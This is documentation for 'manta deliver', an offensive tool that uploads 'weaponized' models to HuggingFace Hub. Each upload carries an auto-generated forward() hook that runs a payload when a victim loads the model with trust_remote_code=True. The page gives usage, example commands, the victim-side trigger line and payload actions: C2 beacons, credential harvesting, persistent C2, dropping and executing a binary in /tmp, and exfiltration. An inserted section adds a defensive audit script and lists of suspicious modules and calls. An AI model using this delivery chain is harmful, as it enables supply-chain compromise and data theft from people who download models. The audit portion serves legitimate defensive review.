# manta deliver

Package and upload weaponized models to HuggingFace Hub or generic HTTP registries. Generates every file the Hub needs so that the payload is extracted automatically once the model is loaded with `trust_remote_code=True`.
## Usage

```bash
# HuggingFace Hub delivery
manta deliver hf \
  --model <WEAPONIZED_MODEL> \
  --repo-id <USER/REPO> \
  --payload-type <TYPE> \
  [--class-name <NAME>] \
  [--private]

# HTTP registry delivery (planned)
manta deliver http --model <MODEL> --url <REGISTRY_URL>
```
## Subcommands

### deliver hf
Upload a weaponized model to HuggingFace Hub with automatic hook generation.
| Flag | Short | Default | Description |
|---|---|---|---|
| `--model` | `-m` | required | Weaponized model file (safetensors) |
| `--repo-id` | `-r` | required | HuggingFace repo (`user/model-name`) |
| `--payload-type` | `-t` | required | Payload type: `beacon`, `credentials`, `c2config`, `tool`, `exfil` |
| `--class-name` | | auto-derived | Override generated Python class name |
| `--private` | | `false` | Create a private repository |
| `--token` | | `$HF_TOKEN` | HuggingFace API token (defaults to environment variable) |
### Generated Files

`deliver hf` generates three files and uploads them to the Hub:
| File | Purpose |
|---|---|
| `model.safetensors` | Weaponized model (normalized to canonical filename) |
| `modeling_hook.py` | Python hook class with `forward()` trigger for payload extraction and dispatch |
| `config.json` | Model configuration with `auto_map` entry pointing to the hook class |
#### modeling_hook.py

The generated hook:

- Subclasses `PreTrainedModel` with a class name derived from the repo slug (or `--class-name`)
- Overrides `forward()` to extract the payload on first call using the embedded extraction key
- Dispatches the payload based on `--payload-type` (beacon → HTTP callback, tool → write + execute, etc.)
- Sets a one-shot flag to prevent re-triggering
- Returns normal model output after extraction
#### config.json

Contains an `auto_map` entry that names the hook class. This tells HuggingFace's `AutoModel.from_pretrained()` to dynamically load the hook class when `trust_remote_code=True` is set.
## Pipeline

```text
manta deliver hf
├─ Normalize model filename → model.safetensors
├─ Generate modeling_hook.py (derive_class_name from repo slug)
├─ Generate config.json with auto_map
├─ Create HuggingFace repo (--private optional)
└─ Upload all three files to Hub
```
## Victim Exploitation

On the victim side, a single line triggers the full chain:

```python
from transformers import AutoModel

model = AutoModel.from_pretrained("user/model-name", trust_remote_code=True)
output = model(input_ids)  # ← first forward() extracts and dispatches payload
```
The hook fires on forward() rather than load_state_dict because HuggingFace transformers 5.x+ uses direct parameter assignment, bypassing load_state_dict entirely. The forward() trigger works across all transformers versions.
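The two facts above (the `auto_map` entry in `config.json` and the single `trust_remote_code=True` load line) are also exactly what a defender can inspect before a model is ever loaded. The audit script below is an added example; it is not part of manta, of HuggingFace transformers, or of this page. It uses only the Python standard library and assumes the directory layout the page describes: a `config.json` whose `auto_map` values point at a Python module sitting in the same directory. The names `audit_model_dir`, `scan_module`, `write_sample_dir`, the `SUSPICIOUS_*` lists and the constructed sample fixture are all mine.

```python
"""Audit a downloaded HuggingFace model directory before enabling trust_remote_code.

Added example, not manta's or transformers' code. Standard library only.
"""
import ast
import json
import os
import tempfile

# Modules whose presence in model code deserves a human look before loading.
SUSPICIOUS_MODULES = {"subprocess", "socket", "urllib", "requests", "http",
                      "ctypes", "base64", "marshal", "pickle"}
# Call names that execute code, spawn processes, or talk to the network.
# Deliberately broad (any ".run(" matches): this is a triage aid, not a verdict.
SUSPICIOUS_CALLS = {"exec", "eval", "system", "popen", "run", "Popen",
                    "urlopen", "chmod", "loads"}


def auto_map_targets(config):
    """Return (AutoClass, 'module.ClassName') pairs from config.json's auto_map.

    Assumption: values are plain strings (the form described on this page).
    """
    targets = []
    for auto_cls, ref in (config.get("auto_map") or {}).items():
        if isinstance(ref, str):
            targets.append((auto_cls, ref))
    return targets


def scan_module(path):
    """Statically scan one Python file; returns sorted finding tags.

    Tags: import:<module>, call:<name>, defines:forward.  Nothing is executed.
    """
    findings = set()
    with open(path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=path)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.add(f"import:{alias.name}")
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in SUSPICIOUS_MODULES:
                findings.add(f"import:{node.module}")
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
            if name in SUSPICIOUS_CALLS:
                findings.add(f"call:{name}")
        elif isinstance(node, ast.FunctionDef) and node.name == "forward":
            # A forward() override is where this page's hook fires.
            findings.add("defines:forward")
    return sorted(findings)


def audit_model_dir(model_dir):
    """Report whether the directory needs remote code and what that code contains."""
    with open(os.path.join(model_dir, "config.json"), encoding="utf-8") as fh:
        config = json.load(fh)
    report = {"requires_remote_code": False, "modules": {}}
    for _auto_cls, ref in auto_map_targets(config):
        report["requires_remote_code"] = True
        module_name = ref.rsplit(".", 1)[0]  # "modeling_hook.Foo" -> "modeling_hook"
        module_path = os.path.join(model_dir, module_name.replace(".", os.sep) + ".py")
        if os.path.exists(module_path):
            report["modules"][ref] = scan_module(module_path)
        else:
            report["modules"][ref] = ["missing-file"]
    return report


# Constructed fixture: only the *shape* of a remote-code hook, no payload logic.
SAMPLE_CONFIG = {"model_type": "demo",
                 "auto_map": {"AutoModel": "modeling_hook.DemoHookModel"}}
SAMPLE_HOOK_SRC = (
    "import subprocess\n"
    "from urllib import request\n"
    "class DemoHookModel:\n"
    "    def forward(self, *a, **k):\n"
    "        subprocess.run(['echo', 'constructed-sample'])\n"
    "        return None\n"
)


def write_sample_dir(config, hook_src=None):
    """Write a constructed model directory into a temp dir and return its path."""
    d = tempfile.mkdtemp(prefix="hf-audit-")
    with open(os.path.join(d, "config.json"), "w", encoding="utf-8") as fh:
        json.dump(config, fh)
    if hook_src is not None:
        with open(os.path.join(d, "modeling_hook.py"), "w", encoding="utf-8") as fh:
            fh.write(hook_src)
    return d


if __name__ == "__main__":
    print(json.dumps(audit_model_dir(write_sample_dir(SAMPLE_CONFIG, SAMPLE_HOOK_SRC)), indent=2))
```

Run it against a snapshot of the repo (for example the local cache directory after a download with the default `trust_remote_code=False`, which refuses to import the hook). A report with `requires_remote_code` true and a `forward`-defining module that also imports process or network modules is the pattern this page's `modeling_hook.py` would produce; the decision to flip `trust_remote_code` should follow a reading of that file, and the loaded revision should be pinned so a later push cannot swap it out.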
## Examples

```bash
# Embed a beacon payload and deliver to HuggingFace
manta embed -m clean.safetensors -o armed.safetensors -p beacon.bin -d 3 -k "pass" > key.json
manta deliver hf -m armed.safetensors -r prof-moody/my-model -t beacon --private

# Deliver with custom class name
manta deliver hf -m armed.safetensors -r prof-moody/custom-arch -t tool --class-name CustomArchModel

# Exfiltration delivery
manta deliver hf -m armed.safetensors -r prof-moody/data-model -t exfil
```
## Payload Types

| Type | `--payload-type` | Dispatch Action |
|---|---|---|
| Beacon | `beacon` | HTTP POST to C2 URL embedded in payload |
| Credentials | `credentials` | Write harvested secrets to disk |
| C2 Config | `c2config` | Establish persistent C2 channel |
| Tool | `tool` | Write binary to `/tmp`, `chmod +x`, execute |
| Exfil Data | `exfil` | Write exfiltrated data to disk |